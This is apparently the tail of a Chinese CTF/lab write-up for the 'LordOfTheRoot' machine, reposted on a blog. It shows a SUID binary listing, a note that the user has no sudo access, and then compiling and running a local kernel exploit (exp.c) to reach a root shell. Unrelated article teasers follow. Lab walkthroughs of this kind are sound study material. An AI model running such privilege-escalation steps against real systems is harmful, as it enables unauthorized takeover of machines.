/SECRET/door2/file
/SECRET/door1/file
/SECRET/door3/file
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/lppasswd
/usr/bin/traceroute6.iputils
/usr/bin/mtr
/usr/bin/sudo
/usr/bin/X
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/i386-linux-gnu/oxide-qt/chrome-sandbox
/usr/sbin/uuidd
/usr/sbin/pppd

也没有sudo权限!尝试内核提权!


内核提权


漏洞利用成功!

smeagol@LordOfTheRoot:/tmp$ ls
exp.c  ns_sploit
smeagol@LordOfTheRoot:/tmp$ gcc exp.c -o exp
smeagol@LordOfTheRoot:/tmp$ ./exp
root@LordOfTheRoot:/tmp# id
uid=0(root) gid=1000(smeagol) groups=0(root),1000(smeagol)
root@LordOfTheRoot:/tmp#


本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/252089.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

U形金属卡

方管不锈钢防盗网挂勾&#xff0c;没找到合适的&#xff0c;自己设计一个。 difference(){ cube([43,20,27]);translate([2,-1,2]) cube([42,29,23]);translate([32,10,-1]) cylinder(50,3,3,$fn360); }if(1){ color("gray") translate([2,-20,2]) cube([23,60,23])…

JAVA中的object类

一、equals方法 1.和equals的比较 既可以判断基本类型有可以判断引用类型 如果判断基本类型&#xff0c;判断的值是否相等 int num1 10; double num2 10.0; System.out.println(num1 num2); 如果判断引用类型&#xff0c;判断的地址是否相等&#xff0c;即判断是不是同一…

myql 项目数据库和表的设计

1.表的设计和创建 2.在navicate运行这些代码 create table user(id int not null auto_increment primary key,name varchar(50) not null unique,password varchar(50) not null,state enum(online,offline) default offline ); create table friend(userid int not null,…

HomeAssistant系统添加HACS插件商店与远程控制家中智能家居

文章目录 基本条件一、下载HACS源码二、添加HACS集成三、绑定米家设备 ​ 上文介绍了如何实现群晖Docker部署HomeAssistant&#xff0c;通过内网穿透在户外控制家庭中枢。本文将介绍如何安装HACS插件商店&#xff0c;将米家&#xff0c;果家设备接入 Home Assistant。 基本条件…

【初中生讲机器学习】5. 从概率到朴素贝叶斯算法,一篇带你看明白!

创建时间&#xff1a;2024-02-04 最后编辑时间&#xff1a;2024-02-05 作者&#xff1a;Geeker_LStar 你好呀~这里是 Geeker_LStar 的人工智能学习专栏&#xff0c;很高兴遇见你~ 我是 Geeker_LStar&#xff0c;一名初三学生&#xff0c;热爱计算机和数学&#xff0c;我们一起加…

[C++]继承(续)

一、基类和派生类对象赋值转换 在public继承时&#xff0c;父类和子类是一个“is - a”的关系。 子类对象赋值给父类对象/父类指针/父类引用&#xff0c;我们认为是天然的&#xff0c;中间不产生临时对象&#xff0c;也叫作父子类赋值兼容规则&#xff08;切割/切片&#xff…

工作与生活平衡:在生活中寻找和谐

工作和生活是我们生活中不断交织的两个重要方面。对许多人来说&#xff0c;找到两者之间的完美平衡已经成为一个持久的挑战。然而&#xff0c;与其专注于平衡&#xff0c;更重要的是要认识到工作和生活并不是可以相互平衡的两个分离实体&#xff0c;而是一个相互影响的循环。正…

服务器和云服务器哪个更安全?

随着云计算技术的不断发展&#xff0c;越来越多的企业开始选择使用云服务器来存储和处理数据。然而&#xff0c;对于一些企业来说&#xff0c;他们可能更倾向于使用传统的服务器。在这种情况下&#xff0c;安全性成为了一个重要的考虑因素。那么&#xff0c;服务器和云服务器哪…

普通编程,机器学习与深度学习

普通编程&#xff1a;基于人手动设置规则&#xff0c;由输入产生输出经典机器学习&#xff1a;人手工指定需要的特征&#xff0c;通过一些数学原理对特征与输出的匹配模式进行学习&#xff0c;也就是更新相应的参数&#xff0c;从而使数学表达式能够更好的根据给定的特征得到准…

windows10忘记密码的解决方案

大家好,我是爱编程的喵喵。双985硕士毕业,现担任全栈工程师一职,热衷于将数据思维应用到工作与生活中。从事机器学习以及相关的前后端开发工作。曾在阿里云、科大讯飞、CCF等比赛获得多次Top名次。现为CSDN博客专家、人工智能领域优质创作者。喜欢通过博客创作的方式对所学的…

【iOS ARKit】3D 人体姿态估计

与基于屏幕空间的 2D人体姿态估计不同&#xff0c;3D人体姿态估计是尝试还原人体在三维世界中的形状与姿态&#xff0c;包括深度信息。绝大多数的现有3D人体姿态估计方法依赖2D人体姿态估计&#xff0c;通过获取 2D人体姿态后再构建神经网络算法&#xff0c;实现从 2D 到 3D人体…

LeetCode 热题 100 | 链表(中下)

目录 1 19. 删除链表的倒数第 N 个节点 2 24. 两两交换链表中的节点 3 25. K 个一组翻转链表 4 138. 随机链表的复制 菜鸟做题第三周&#xff0c;语言是 C 1 19. 删除链表的倒数第 N 个节点 到底是节点还是结点。。。 解题思路&#xff1a; 设置双指针 left 和 ri…

聊聊比特币----比特币地址

⽐特币地址是⼀个标识符&#xff08;帐号&#xff09;&#xff0c;地址可以以QR码形式表⽰&#xff0c;是匿名的&#xff0c;不包含关于所有者的信息。 ⼤多数⽐特币地址(P2PKH,P2SH)是34个字符。它们由随机数字和⼤写字母及⼩写字母组成&#xff0c;除了⼤写字母“O”&#x…

前端复杂 table 渲染及 excel.js 导出

转载请注明出处&#xff0c;点击此处 查看更多精彩内容 现在我们有一个如图&#xff08;甚至更复杂&#xff09;的表格需要展示到页面上&#xff0c;并提供下载为 excel 文件的功能。 前端表格渲染我们一般会使用 element-ui 等组件库提供的 table 组件&#xff0c;这些组件一般…

css3 属性 backface-visibility 的实践应用

backface-visibility 是一个用于控制元素在面对屏幕不同方向时的可见性的CSS3特性。它有两个可能的值&#xff1a; visible&#xff1a;当元素不面向屏幕&#xff08;即背面朝向用户&#xff09;时&#xff0c;元素的内容是可以被看到的。hidden&#xff1a;当元素不面向屏幕…

day32 买卖股票的最佳时机Ⅱ 跳跃游戏 跳跃游戏Ⅱ

题目1&#xff1a;122 买卖股票的最佳时机Ⅱ 题目链接&#xff1a;122 买卖股票的最大时机Ⅱ 题意 整数数组prices[i]表示某股票的第i天的价格&#xff0c;每天可买卖股票且最多持有1股股票&#xff0c;返回最大利润 利润拆分&#xff0c;拆分为每天的利润 每天的正利…

基于若依的ruoyi-nbcio流程管理系统自定义业务回写状态的一种新方法(二)

更多ruoyi-nbcio功能请看演示系统 gitee源代码地址 前后端代码&#xff1a; https://gitee.com/nbacheng/ruoyi-nbcio 演示地址&#xff1a;RuoYi-Nbcio后台管理系统 更多nbcio-boot功能请看演示系统 gitee源代码地址 后端代码&#xff1a; https://gitee.com/nbacheng/n…

【八大排序】选择排序 | 堆排序 + 图文详解!!

&#x1f4f7; 江池俊&#xff1a; 个人主页 &#x1f525;个人专栏&#xff1a; ✅数据结构冒险记 ✅C语言进阶之路 &#x1f305; 有航道的人&#xff0c;再渺小也不会迷途。 文章目录 一、选择排序1.1 基本思想1.2 算法步骤 动图演示1.3 代码实现1.4 选择排序特性总结 二…

Vue3项目封装一个Element-plus Pagination分页

前言:后台系统分页肯定是离不开的,但是ui框架都很多,我们可以定义封装一种格式,所有项目按到这个结构来做. 实例: 第一步:在项目components组件新建一个分页组件,用来进行封装组件. 第二步:根据官方的进行定义,官方提供的这些,需要我们封装成动态模式 第三步:代码改造 <!-…

aspose-words基础功能演示

我们在Aspose.Words中使用术语“渲染”来描述将文档转换为文件格式或分页或具有页面概念的介质的过程。我们正在讨论将文档呈现为页面。下图显示了 Aspose.Words 中的渲染情况。 Aspose.Words 的渲染功能使您能够执行以下操作: 将文档或选定页面转换为 PDF、XPS、HTML、XAML、…